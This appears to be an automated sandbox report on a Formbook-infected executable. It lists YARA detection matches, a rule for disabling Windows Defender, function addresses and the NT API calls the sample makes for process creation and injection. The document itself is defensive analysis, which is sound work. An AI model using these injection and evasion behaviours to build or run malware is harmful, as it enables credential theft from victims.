Source: 00000003.00000002.568042051.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.489825108.0000000004F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.489825108.0000000004F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

.NET source code contains very large array initializations

Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, TTgRfVYhTcfTOWPfY/QKSMLaRKXNTJLLdXS.cs

Large array initialization: QfbcJdgJKQMMNfJNZ: array initializer size 522752

Source: 3.0.ByteCodeGenerator.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.ByteCodeGenerator.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.ByteCodeGenerator.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.ByteCodeGenerator.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.ByteCodeGenerator.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.ByteCodeGenerator.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.ByteCodeGenerator.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.ByteCodeGenerator.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.ByteCodeGenerator.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.ByteCodeGenerator.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.ByteCodeGenerator.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.ByteCodeGenerator.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.SecuriteInfo.com.Variant.Tedy.130342.18814.exe.4bce918.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 0.2.SecuriteInfo.com.Variant.Tedy.130342.18814.exe.4bce918.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 3.0.ByteCodeGenerator.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.ByteCodeGenerator.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.ByteCodeGenerator.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.ByteCodeGenerator.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.ByteCodeGenerator.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.ByteCodeGenerator.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.471199219.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.471199219.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.470778539.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.470778539.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.707469060.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.707469060.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.533300024.0000000005B9A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.533300024.0000000005B9A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.513489612.0000000005B9A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.513489612.0000000005B9A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.487374826.0000000004C33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.487374826.0000000004C33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.707690856.0000000003980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.707690856.0000000003980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.470404681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.470404681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.487565258.0000000004C93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.487565258.0000000004C93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.568261585.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.568261585.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.706770545.0000000003340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.706770545.0000000003340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.568042051.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.568042051.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.489825108.0000000004F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.489825108.0000000004F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Code function: 0_2_009DD014	0_2_009DD014
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Code function: 0_2_009DE5B4	0_2_009DE5B4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Code function: 0_2_009D884F	0_2_009D884F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Code function: 0_2_01873240	0_2_01873240
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Code function: 0_2_01872600	0_2_01872600
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Code function: 0_2_0187A9E8	0_2_0187A9E8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Code function: 0_2_0187EB08	0_2_0187EB08
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Code function: 0_2_01878B70	0_2_01878B70
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Code function: 0_2_01872C18	0_2_01872C18
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Code function: 0_2_0187F4F0	0_2_0187F4F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Code function: 0_2_0187A9F8	0_2_0187A9F8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Code function: 0_2_0187EFA7	0_2_0187EFA7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Code function: 0_2_0187AEF0	0_2_0187AEF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Code function: 0_2_009DEAE8	0_2_009DEAE8
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_00401030	3_2_00401030
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0041E9D9	3_2_0041E9D9
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0040928C	3_2_0040928C
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_00409290	3_2_00409290
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0040DC30	3_2_0040DC30
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_00402D90	3_2_00402D90
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0041E77C	3_2_0041E77C
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0041DF9E	3_2_0041DF9E
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_00402FB0	3_2_00402FB0
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034F2B28	3_2_034F2B28
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034EDBD2	3_2_034EDBD2
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0345EBB0	3_2_0345EBB0
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034F22AE	3_2_034F22AE
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0342F900	3_2_0342F900
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03444120	3_2_03444120
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034E1002	3_2_034E1002
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034F28EC	3_2_034F28EC
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0343B090	3_2_0343B090
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034520A0	3_2_034520A0
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034F20A8	3_2_034F20A8
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034F1FF1	3_2_034F1FF1
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034ED616	3_2_034ED616
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03446E30	3_2_03446E30
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034F2EF7	3_2_034F2EF7
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034F1D55	3_2_034F1D55
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034F2D07	3_2_034F2D07
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03420D20	3_2_03420D20
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034F25DD	3_2_034F25DD
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0343D5E0	3_2_0343D5E0
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03452581	3_2_03452581
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034ED466	3_2_034ED466
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0343841F	3_2_0343841F
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05671D55	12_2_05671D55
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055AF900	12_2_055AF900
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05672D07	12_2_05672D07
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055A0D20	12_2_055A0D20
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055C4120	12_2_055C4120
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_056725DD	12_2_056725DD
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055BD5E0	12_2_055BD5E0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055D2581	12_2_055D2581
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055B841F	12_2_055B841F
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05661002	12_2_05661002
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_056728EC	12_2_056728EC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055BB090	12_2_055BB090
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_056720A8	12_2_056720A8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055D20A0	12_2_055D20A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05672B28	12_2_05672B28
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05671FF1	12_2_05671FF1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0566DBD2	12_2_0566DBD2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055DEBB0	12_2_055DEBB0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055C6E30	12_2_055C6E30
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05672EF7	12_2_05672EF7
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_056722AE	12_2_056722AE
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_03349290	12_2_03349290
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0334928C	12_2_0334928C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0335E9D9	12_2_0335E9D9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0335E77C	12_2_0335E77C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_03342FB0	12_2_03342FB0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_03342D90	12_2_03342D90
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0334DC30	12_2_0334DC30

Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 055AB150 appears 35 times
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: String function: 0342B150 appears 35 times

Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0041A330 NtCreateFile,	3_2_0041A330
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0041A3E0 NtReadFile,	3_2_0041A3E0
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0041A460 NtClose,	3_2_0041A460
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0041A510 NtAllocateVirtualMemory,	3_2_0041A510
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0041A32F NtCreateFile,	3_2_0041A32F
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0041A45A NtClose,	3_2_0041A45A
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0041A50A NtAllocateVirtualMemory,	3_2_0041A50A
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03469A50 NtCreateFile,LdrInitializeThunk,	3_2_03469A50
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03469A00 NtProtectVirtualMemory,LdrInitializeThunk,	3_2_03469A00
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03469A20 NtResumeThread,LdrInitializeThunk,	3_2_03469A20
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03469910 NtAdjustPrivilegesToken,LdrInitializeThunk,	3_2_03469910
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034699A0 NtCreateSection,LdrInitializeThunk,	3_2_034699A0
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03469840 NtDelayExecution,LdrInitializeThunk,	3_2_03469840
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03469860 NtQuerySystemInformation,LdrInitializeThunk,	3_2_03469860
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034698F0 NtReadVirtualMemory,LdrInitializeThunk,	3_2_034698F0
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03469710 NtQueryInformationToken,LdrInitializeThunk,	3_2_03469710
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03469FE0 NtCreateMutant,LdrInitializeThunk,	3_2_03469FE0
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03469780 NtMapViewOfSection,LdrInitializeThunk,	3_2_03469780
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034697A0 NtUnmapViewOfSection,LdrInitializeThunk,	3_2_034697A0
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03469660 NtAllocateVirtualMemory,LdrInitializeThunk,	3_2_03469660
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034696E0 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_034696E0
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03469540 NtReadFile,LdrInitializeThunk,	3_2_03469540
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034695D0 NtClose,LdrInitializeThunk,	3_2_034695D0
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03469B00 NtSetValueKey,	3_2_03469B00
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0346A3B0 NtGetContextThread,	3_2_0346A3B0
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03469A10 NtQuerySection,	3_2_03469A10
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03469A80 NtOpenDirectoryObject,	3_2_03469A80
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03469950 NtQueueApcThread,	3_2_03469950
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034699D0 NtCreateProcessEx,	3_2_034699D0
